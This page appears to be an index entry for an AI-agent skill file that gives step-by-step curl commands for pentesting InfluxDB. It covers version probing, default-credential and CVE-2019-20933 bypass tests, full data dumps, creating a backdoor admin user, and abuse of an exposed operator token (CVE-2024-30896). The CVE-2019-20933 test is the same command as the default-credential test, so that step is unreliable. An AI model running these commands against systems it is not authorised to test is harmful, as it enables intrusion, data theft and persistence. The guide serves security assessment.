OpenSkillIndex← back to search

Hacktricks-skills influxdb-pentest

Pentest InfluxDB time-series databases on port 8086. Use this skill whenever you need to enumerate, test authentication, or extract data from InfluxDB instances. Trigger for any InfluxDB assessment, time-series database testing, port 8086 enumeration, or when you discover an InfluxDB service during reconnaissance. This skill covers both v1.x (InfluxQL) and v2.x (Flux API) versions.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/8086-pentesting-influxdb/SKILL.MD
source content

InfluxDB Pentesting Skill

A comprehensive guide for testing InfluxDB time-series databases during security assessments.

Quick Start

When you encounter an InfluxDB instance (port 8086), follow this workflow:

  1. Identify version - Determine if it's v1.x or v2.x
  2. Test authentication - Check if auth is required or bypassed
  3. Enumerate - List databases, measurements, and users
  4. Extract data - Dump sensitive information if accessible
  5. Check for vulnerabilities - Test for known CVEs

Step 1: Version Identification

Determine the InfluxDB version to know which API to use.

v1.x Detection

# Banner grab - returns 204 with version headers
curl -i http://<host>:8086/ping

Look for 

X-Influxdb-Version
and 
X-Influxdb-Build
headers.

v2.x Detection

# Health check - returns JSON with version
curl -s http://<host>:8086/health | jq .

This works without authentication on most deployments.

Check for Metrics Endpoint

Exposed instances often serve Prometheus-style metrics:

curl -s http://<host>:8086/metrics | head -20

Step 2: Authentication Testing

Test Unauthenticated Access (v1)

# Try connecting without credentials
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

If this returns database names, authentication is disabled.

Test with Default Credentials

# Common default credentials
curl -sG "http://<host>:8086/query" \
  --data-urlencode "u=influx" \
  --data-urlencode "p=influx" \
  --data-urlencode "q=SHOW DATABASES"

Test CVE-2019-20933 (Auth Bypass)

This vulnerability allowed authentication bypass in certain versions:

# Test the bypass - if successful, you can query without valid auth
curl -sG "http://<host>:8086/query" \
  --data-urlencode "u=influx" \
  --data-urlencode "p=influx" \
  --data-urlencode "q=SHOW DATABASES"

If you get results despite invalid credentials, the bypass may work.

Step 3: Enumeration (v1.x - InfluxQL)

List Databases

curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES" | jq .

Common databases to look for:

  • telegraf
    - System metrics
  • _internal
    - Internal InfluxDB metrics
  • Custom application databases

List Users (if auth disabled)

curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS" | jq .

List Measurements (Tables)

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW MEASUREMENTS" | jq .

List Field Keys (Columns)

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW FIELD KEYS" | jq .

List Retention Policies

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SHOW RETENTION POLICIES" | jq .

Step 4: Data Extraction

Dump Sample Data

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement> LIMIT 10" | jq .

Dump All Data from Measurement

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement>" | jq .

Force Epoch Timestamps

Useful for programmatic processing:

curl -sG "http://<host>:8086/query" \
  --data-urlencode "epoch=ns" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT * FROM <measurement> LIMIT 10" | jq .

Query Specific Fields

curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=<database_name>" \
  --data-urlencode "q=SELECT usage_idle, usage_user FROM cpu WHERE host='ubuntu'" | jq .

Step 5: Privilege Escalation (if auth disabled)

Create Admin User

curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"

Grant Privileges to Existing User

curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=GRANT ALL PRIVILEGES ON <database_name> TO <username>"

InfluxDB v2.x Enumeration (Token-based)

If you have a token (from logs, configs, or CVE-2024-30896):

Set Up Token Header

TOKEN="<your_token>"
H="-H Authorization: Token $TOKEN"

List Organizations

curl -s $H http://<host>:8086/api/v2/organizations | jq .

List Buckets (Databases)

curl -s $H 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

List Authorizations

ORGID="<org_id>"
curl -s $H "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

Query with Flux

curl -s $H \
  -H 'Accept: application/csv' \
  -H 'Content-Type: application/vnd.flux' \
  -X POST http://<host>:8086/api/v2/query \
  --data 'from(bucket:"<bucket_name>") |> range(start:-1h) |> limit(n:10)'

Known Vulnerabilities

CVE-2024-30896 - Operator Token Exposure (v2.x)

In InfluxDB OSS 2.x through 2.7.11, authenticated users with read access to authorizations in the default organization could retrieve the operator token.

Test:

curl -s -H 'Authorization: Token <user_token>' \
  'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .

Look for entries with type "operator" - the token may be exposed in the response.

Impact: With the operator token, you can:

  • Administer the entire instance
  • Access all data across organizations
  • Create/modify tokens and users

CVE-2019-20933 - Authentication Bypass (v1.x)

Affected versions allowed authentication bypass through crafted requests. Test with invalid credentials - if queries succeed, the bypass works.

Automated Enumeration

Metasploit

msf6 > use auxiliary/scanner/http/influxdb_enum
msf6 > set RHOSTS <target>
msf6 > run

Common Findings

Sensitive Data to Look For

  • System metrics - Hostnames, IP addresses, system info
  • Application data - User activity, transactions, logs
  • Credentials - Sometimes stored in field values
  • Internal network topology - From monitoring data

Typical Database Names

  • telegraf
    - System monitoring
  • _internal
    - InfluxDB internal metrics
  • metrics
    - Generic metrics database
  • app_metrics
    - Application-specific
  • logs
    - Log data

Tips

  1. Always test both v1 and v2 APIs - Some v1.8+ servers accept v2-style requests
  2. Check for unauthenticated access first - Many deployments have auth disabled
  3. Look for default credentials - 
    influx/influx
    is common
  4. Use jq for parsing - Makes JSON output readable
  5. Quote measurement names - Some versions require 
    "measurement"
    syntax
  6. Check /metrics endpoint - May expose additional information
  7. Test CVE-2024-30896 on v2.x - Operator token exposure is critical

Output Format

When documenting findings, use this structure:

## InfluxDB Assessment Results

### Version
- Detected: v1.7.5 / v2.x.x
- Endpoint: http://<host>:8086

### Authentication
- Status: Disabled / Enabled / Bypassed
- Default credentials: Working / Not working

### Databases Found
- <database_name>: <description>

### Measurements
- <measurement_name>: <field_count> fields

### Data Extracted
- <measurement>: <record_count> records
- Sample: <first few lines>

### Vulnerabilities
- CVE-2019-20933: Exploitable / Not applicable
- CVE-2024-30896: Exploitable / Not applicable

### Recommendations
- Enable authentication
- Update to latest version
- Remove default credentials
- Restrict network access

References